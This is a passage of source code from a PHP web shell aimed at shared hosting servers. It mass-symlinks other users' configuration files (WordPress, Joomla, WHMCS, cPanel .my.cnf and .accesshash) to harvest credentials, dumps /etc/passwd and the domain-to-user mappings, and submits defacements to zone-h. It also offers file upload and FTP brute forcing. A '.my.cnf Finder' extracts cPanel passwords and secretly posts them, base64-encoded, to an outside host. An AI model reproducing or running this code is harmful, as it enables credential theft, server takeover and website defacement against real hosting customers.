3670. @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3671. @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3672. @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3673. @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3674. @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3675. @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3676. @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3677. @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3678. @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3679. @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3680. @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3681. @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3682. @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3683. @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3684. @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3685. @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3686. @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3687. @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3688. @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3689. @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3690. @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3691. @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3692. @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3693. @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3694. @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3695. @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3696. @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3697. @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3698. @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3699. @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3700. @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3701. @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3702. @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3703. @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3704. @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3705. @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3706. @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3707. @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3708. @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3709. @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3710. @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3711. @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3712. @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3713. @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3714. @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3715. @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3716. @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3717. @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3718. @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3719. @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3720. @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3721. @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3722. @symlink('/home4/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3723. @symlink('/home4/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3724. @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3725. @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3726. @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3727. @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3728. @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3729. @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3730. @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3731. @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3732. @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3733. @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3734. @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3735. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3736. @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3737. @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3738. @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3739. @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3740. @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3741. @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3742. @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3743. @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3744. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3745. @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3746. @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3747. @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3748. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3749. @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3750. @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3751. @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3752. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3753. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3754. @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3755. @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt');
3756. @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3757. @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3758. @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3759. @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3760. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3761. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3762. @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3763. @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3764. @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3765. @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3766. @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3767. @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3768. @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3769. @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3770. @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt');
3771. @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3772. @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3773. @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3774. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3775. @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3776. @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3777. @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3778. @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3779. @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3780. @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3781. @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3782. @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3783. @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3784. @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3785. @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3786. @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3787. @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3788. @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3789. @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3790. @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3791. @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3792. @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3793. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3794. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt');
3795. @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3796. @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3797. @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3798. @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3799. @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3800. @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3801. @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3802. @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3803. @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3804. @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3805. @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3806. @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3807. @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3808. @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3809. @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3810. @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3811. @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3812. @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3813. @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3814. @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3815. @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3816. @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3817. @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3818. @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3819. @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3820. @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3821. @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3822. @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3823. @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3824. @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3825. @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3826. @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3827. @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3828. @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3829. @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3830. @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3831. @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3832. @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3833. @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3834. @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3835. @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3836. @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3837. @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3838. @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3839. @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3840. @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3841. @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3842. @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3843. @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3844. @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3845. @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3846. @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3847. @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3848. @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3849. @symlink('/', 'btmgrab/root');
3850. }
3851. echo "<center><a href='btmgrab/root' target='_blank'><h1>Root</h1></a><br>
3852. <br>
3853. <center><a href='btmgrab' target='_blank'><h1>Configurations</h1></a><br>";
3854. echo "<title> Domains & Users</title>
3855.  
3856.  
3857. <p align=center> Domains & Users</p>
3858.  
3859. <center>";
3860. $d0mains = @file("/etc/named.conf");
3861. if (!$d0mains) {
3862. die("<b> can't Read /etc/named.conf<br><br><br> Done");
3863. }
3864. echo "<table align=center border=1>
3865.  
3866. <tr bgcolor=green><td>DOMAINS</td><td>USERs</td></tr>";
3867. foreach ($d0mains as $d0main) {
3868. if (eregi("zone", $d0main)) {
3869. preg_match_all('#zone "(.*)"#', $d0main, $domains);
3870. flush();
3871. if (strlen(trim($domains[1][0])) > 2) {
3872. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
3873. echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
3874. flush();
3875. }
3876. }
3877. }
3878. echo "</table>
3879.  
3880. <p align='center'>
3881.  
3882. </p>
3883.  
3884. ";
3885. echo "<center>Done<br><br/>";
3886. } else {
3887. echo '<center>
3888. <form method="POST">
3889. <textarea name="passwd" style="width: 543px; height: 420px; background-color:transparent; font-family:Tahoma; font-size:8pt; ">';
3890. flush();
3891. $file = '/etc/passwd';
3892. $read = @fopen($file, 'r');
3893. if ($read) {
3894. $body = @fread($read, @filesize($file));
3895. echo "" . htmlentities($body) . "";
3896. } elseif (!$read) {
3897. $read = @show_source($file);
3898. } elseif (!$read) {
3899. $read = @highlight_file($file);
3900. } elseif (!$read) {
3901. for ($uid = 0;$uid < 1000;$uid++) {
3902. $ara = posix_getpwuid($uid);
3903. if (!empty($ara)) {
3904. while (list($key, $val) = each($ara)) {
3905. print "$val:";
3906. }
3907. print "
3908. ";
3909. }
3910. }
3911. }
3912. flush();
3913. echo '</textarea></br>
3914. <p>&nbsp;</p><center>
3915. <input name="m" size="80" value="Hajar" type="submit" style="width: 99; font-family:Tahoma; font-size:10pt;; text-transform:uppercase; height:23; background-color:#transparent"/></br>
3916. </form>
3917. ';
3918. }
3919.  
3920. }
3921. elseif($_GET['do'] == 'zoneh') {
3922. if($_POST['submit']) {
3923. $domain = explode("\r\n", $_POST['url']);
3924. $nick = $_POST['nick'];
3925. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3926. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3927. function zoneh($url,$nick) {
3928. $ch = curl_init("http://www.zone-h.com/notify/single");
3929. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3930. curl_setopt($ch, CURLOPT_POST, true);
3931. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3932. return curl_exec($ch);
3933. curl_close($ch);
3934. }
3935. foreach($domain as $url) {
3936. $zoneh = zoneh($url,$nick);
3937. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3938. echo "$url -> <font color=lime>OK</font><br>";
3939. } else {
3940. echo "$url -> <font color=red>ERROR</font><br>";
3941. }
3942. }
3943. } else {
3944. echo "<center><form method='post'>
3945. <font style='text-decoration: underline;'>Zone-H Poster :</font><br>
3946. <u>Defacer</u>: <br>
3947. <input type='text' name='nick' size='50' value='Jingklong'><br>
3948. <u>Domains</u>: <br>
3949. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3950. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3951. </form>";
3952. }
3953. echo "</center>";
3954. }
3955. elseif($_GET['do'] == 'upload') {
3956. echo "<center>";
3957. if($_POST['upload']) {
3958. if($_POST['tipe_upload'] == 'biasa') {
3959. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
3960. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
3961. } else {
3962. $act = "<font color=red>failed to upload file</font>";
3963. }
3964. } else {
3965. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
3966. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
3967. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
3968. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
3969. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
3970. } else {
3971. $act = "<font color=red>failed to upload file</font>";
3972. }
3973. } else {
3974. $act = "<font color=red>failed to upload file</font>";
3975. }
3976. }
3977. }
3978. echo "Upload File:
3979. <form method='post' enctype='multipart/form-data'>
3980. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
3981. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
3982. <input type='file' name='ix_file'>
3983. <input type='submit' value='upload' name='upload'>
3984. </form>";
3985. echo $act;
3986. echo "</center>";
3987. }
3988. elseif($_GET['do'] == 'brut') {
3989. echo "<center>";
3990. echo "<ul>";
3991. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
3992. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
3993. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
3994. echo "</ul>";
3995. echo "</center>";
3996. }
3997. elseif($_GET['do'] == 'hunt') {
3998. echo "<center>";
3999. echo "<ul>";
4000. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
4001. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
4002. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
4003. echo "</ul>";
4004. echo "</center>";
4005.  
4006. echo "<center>";
4007. $d0mains = @file('/etc/named.conf');
4008. $domains = scandir("/var/named");
4009.  
4010. if ($domains or $d0mains)
4011. {
4012. $domains = scandir("/var/named");
4013. if($domains) {
4014. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
4015. $count=1;
4016. $dc = 0;
4017. $list = scandir("/var/named");
4018. foreach($list as $domain){
4019. if(strpos($domain,".db")){
4020. $domain = str_replace('.db','',$domain);
4021. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
4022. $dirz = '/home/'.$owner['name'].'/.my.cnf';
4023. $path = getcwd();
4024.  
4025. if (is_readable($dirz)) {
4026. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
4027. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
4028. $password=entre2v2($p,'password="','"');
4029. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
4030. $dc++;
4031. $success="http://".$domain."|".$owner['name']."|".$password."\n";
4032. $ch = curl_init();
4033. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
4034. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
4035. curl_setopt($ch, CURLOPT_POST, 1);
4036. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success));
4037. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4038. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4039. curl_setopt($ch, CURLOPT_HEADER, 1);
4040. $buffer = curl_exec($ch);
4041. }
4042.  
4043. }
4044. }
4045. echo '</table>';
4046. $total = $dc;
4047. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
4048. echo '</center>';
4049. }else{
4050. $d0mains = @file('/etc/named.conf');
4051. if($d0mains) {
4052. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
4053. $count=1;
4054. $dc = 0;
4055. $mck = array();
4056. foreach($d0mains as $d0main){
4057. if(@eregi('zone',$d0main)){
4058. preg_match_all('#zone "(.*)"#',$d0main,$domain);
4059. flush();
4060. if(strlen(trim($domain[1][0])) >2){
4061. $mck[] = $domain[1][0];
4062. }
4063. }
4064. }
4065. $mck = array_unique($mck);
4066. $usr = array();
4067. $dmn = array();
4068. foreach($mck as $o) {
4069. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
4070. $usr[] = $infos['name'];
4071. $dmn[] = $o;
4072. }
4073. array_multisort($usr,$dmn);
4074. $dt = file('/etc/passwd');
4075. $passwd = array();
4076. foreach($dt as $d) {
4077. $r = explode(':',$d);
4078. if(strpos($r[5],'home')) {
4079. $passwd[$r[0]] = $r[5];
4080. }
4081. }
4082. $l=0;
4083. $j=1;
4084. foreach($usr as $r) {
4085. $dirz = '/home/'.$r.'/.my.cnf';
4086. $path = getcwd();
4087. if (is_readable($dirz)) {
4088. copy($dirz, ''.$path.'/'.$r.'.txt');
4089. $p=file_get_contents(''.$path.'/'.$r.'.txt');
4090. $password=entre2v2($p,'password="','"');
4091. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
4092. $dc++;
4093. flush();
4094. $l=$l?0:1;
4095. $j++;
4096. }
4097. }
4098. }
4099. echo '</table>';
4100. $total = $dc;
4101. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
4102. echo '</center>';
4103.  
4104. }
4105. }else{
4106. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
4107. }
4108.  
4109. echo "</body></html>";
4110. }
4111. elseif($_GET['do'] == 'ftpb') {
4112. echo "<center>";
4113. echo "<ul>";
4114. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
4115. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
4116. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
4117. echo "</ul>";
4118. echo "</center>";
4119. echo "
4120. <p align='center' dir='ltr'><font face='Tahoma' size='4'>[#] FTP Brute Force [#]</font></p>
4121. <form method='POST'>
4122. <center>
4123. <p dir='ltr'>
4124. <textarea style='width: 450px; height: 150px;' cols='30' rows='10' name='username' placeholder='username List'></textarea>
4125. <textarea style='width: 450px; height: 150px;' cols='30' rows='10' name='password' placeholder='Password List'></textarea></p>
4126. <input type='text' name='ip' value='127.0.0.1'>
4127. <input type='submit' value='BruteFTP' name='start'><br>
4128. <p><font face='Verdana' size='1'>[+] ReSulT [+]</font></p>
4129. </form>";
4130. @set_time_limit(0);
4131. $ip = $_POST['ip'];
4132. $username = explode("\n",$_POST['username']);
4133. $password = explode("\n",$_POST['password']);
4134.  
4135. if($_POST['start']) {
4136. function brute($connect,$ip,$user,$pass)
4137. {
4138. $connect = ftp_connect($ip) or die("Error , Maybe you were Banned From Server");
4139. if(ftp_login($connect, $user, $pass)) {
4140. echo "<p dir='ltr'><font face='Tahoma' size='2'>Cracked :
4141. <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>"; }
4142. }
4143.  
4144. foreach($username as $user) {
4145. foreach($password as $pass) {
4146. brute($connect,$ip,$user,$pass);
4147. } }
4148. }
4149. echo "<p><font face='Verdana' size='1'>
